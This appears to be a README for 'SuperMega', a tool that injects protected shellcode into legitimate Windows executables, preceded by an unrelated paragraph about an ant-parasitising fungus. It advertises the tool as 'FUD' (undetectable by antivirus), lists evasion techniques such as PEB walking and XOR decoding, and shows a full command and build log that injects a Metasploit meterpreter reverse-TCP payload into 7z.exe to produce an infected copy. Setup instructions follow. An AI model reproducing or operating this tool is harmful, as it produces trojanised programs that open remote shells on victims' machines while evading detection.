Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes insect hosts of the order Hymenoptera, primarily ants. O. camponoti-balzani infects ants, and eventually kills the hosts after they move to an ideal location for the fungus to spread its spores.

What

SuperMega is a shellcode loader. It will take a shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an exe.

FUD.

And:

Only works with 64 bit (shellcode and infecteble exe's)

Features:

Loader source is C yay
Execution-Guardrails
- Environment variables
configurable implementation
different EXE injection techniques

Plugins:

source style:
- PEB_WALK
- IAT_REUSE
alloc style:
- RWX
- REUSE_RWX
decoder style:
- PLAIN_1
- XOR_1
dataref style:
- APPEND

Examples

Metasploit in 7z

Inject metasploit into 7z.exe. It will use PEB_WALK.

PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py   ) --[ Remove old files ]
(model.py    ) --( Capabilities: 
(model.py    )   0x0: GetEnvironmentVariableW (b'')
(model.py    )   0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup  : build\main.asm ]
(compiler.py )     > Replace external reference at line: 8
(compiler.py )     > Replace external reference at line: 395
(compiler.py )     > Replace payload length at line: 389
(compiler.py )     > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py   ) --[ Code section: .text
(helper.py   )     > 0x1000 Code Size: 2557  (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449  Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]

Directories

shellcodes/: Input: Shellcodes we want to use as input (payload)
source/: Input: Loader C templates
plugins/: Input: Loader C implementations
exes/: Input: Nonmalicious EXE files we inject into
build/: build: Temporary files during build process
logs/: build: Files generated by building (inspect for debugging)
out/: output. The generated result: infected exe

Installation

Paths

Configure config.yaml with:

Path to Visual Studio 2022 compiler and assembler
Path to mash_shc and runshc: https://github.com/hasherezade/masm_shc.

config.yaml:

path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64:  'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'

path_masmshc:  'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'

Make sure its the Hostx64/x64/ one exe. Make sure to compile msmshc and runshc as 64bit. You can also replace runshc with your own shellcode loader.

Environment Variables

It needs all the Microsoft Visual Studio specific paths as environment variables. Either start the "visual studio developer console", or if you are sane, use the following commandline to get all the damn env right. Use this when Cannot find Windows.h.

cmd.exe /c "`"C:\Program Files (x86)\Microsoft Visual Studio\<year>\<edition>\Common7\Tools\VsDevCmd.bat`" && powershell"

Also make sure radare2 is in path:

$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin"

Alternative

Use

"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"

or the VS developer console to find the damn environment variables, and set it in your python console. In my case:

$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"

VS2022 Components

A list of packages/components which may be required for Visual Studio 2022:

C++ 2022 Redistributable Update
C++ Build Insights
C++ CMake tools for windows
C++ /CLI support for v143 build tools (lastest)
MSBuild
MSVC v133 - VS 2002 C++ x64/x86 build tools (latest)
C++ ATL for latest v143 build tools (x86 & x64)
C++ MFC for latest v143 build tools (x86 & x64)
Windows 11 SDK

Languages

Python 57.8%

CSS 16.4%

C 11%

HTML 9.9%

Assembly 4.9%